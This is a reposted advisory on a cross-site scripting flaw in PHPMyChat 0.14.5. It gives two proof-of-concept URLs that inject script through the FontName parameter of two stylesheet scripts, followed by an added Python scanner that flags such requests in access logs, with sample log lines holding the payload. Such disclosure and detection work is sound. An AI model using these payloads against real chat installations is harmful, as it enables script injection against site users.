[Repost] PHPHeaven PHPMyChat Cross-Site Scripting Vulnerability and Test Method
Source: www.phpheaven.net
Vulnerable versions: PHPMyChat 0.14.5
Proof of concept:
http://www.example.com/chat/config/start-page.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert(test);</script>
http://www.example.com/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert(test);</script>
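
A log check built from the two requests above, as an added example that is not part of the original post: it scans access-log lines for requests to the two stylesheet scripts whose Charset, medium or FontName value falls outside an allow-list. The allow-list patterns, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Allow-list patterns are assumptions about legitimate values; the advisory
# only shows Charset=iso-8859-1, medium=10 and the FontName parameter.
ALLOWED = {
    "Charset": re.compile(r"[A-Za-z0-9._-]{1,40}"),
    "medium": re.compile(r"[0-9]{1,3}"),
    "FontName": re.compile(r"[A-Za-z0-9 ,-]{1,100}"),
}
# The two stylesheet scripts named in the advisory (install prefix may vary).
TARGETS = ("/config/start-page.css.php3", "/config/style.css.php3")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (.+?) HTTP/[0-9.]+"')


def scan(lines):
    """Return (line_no, parameter, decoded_value) for each out-of-policy value."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith(TARGETS):
            continue
        # parse_qs decodes once, so a double-encoded value keeps its '%'
        # and still fails the allow-list.
        params = parse_qs(url.query)
        for name, rule in ALLOWED.items():
            for value in params.get(name, []):
                if not rule.fullmatch(value):
                    findings.append((line_no, name, value))
    return findings


# Constructed sample lines (documentation addresses, invented timestamps and paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=Arial HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /chat/config/start-page.css.php3?Charset=iso-8859-1&medium=10&FontName=%3Cscript%3Evar%20test=1;alert(test);%3C/script%3E HTTP/1.1" 200 540',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=%253Cb%253E HTTP/1.1" 200 512',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /chat/index.php3?FontName=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only the three parameters shown in the advisory are checked, and only on the two named scripts, so the fourth sample line is ignored.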